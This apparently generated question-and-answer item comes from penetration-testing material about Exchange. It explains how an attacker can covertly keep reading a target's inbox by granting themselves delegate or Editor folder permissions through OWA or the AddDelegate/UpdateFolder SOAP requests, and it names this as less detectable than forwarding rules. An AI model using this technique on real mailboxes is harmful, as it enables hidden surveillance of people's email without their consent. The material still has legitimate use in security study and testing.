What is a less detectable method to continuously read a target user's Exchange emails without modifying their mailbox rules?

Instead of forwarding rules, an attacker can add themselves (user test2) as a delegate with folder permissions on test1's inbox. This can be done via Outlook Web App (OWA) by setting "Editor" permissions, or programmatically using **AddDelegate** or **UpdateFolder** SOAP requests. User test2 can then access test1's inbox as a shared folder. However, note that if test1 deletes an email, test2 loses access to that message. This approach is covered in the article alongside the Penetration Basics - Implementation of Exchange One-Liner Backdoor.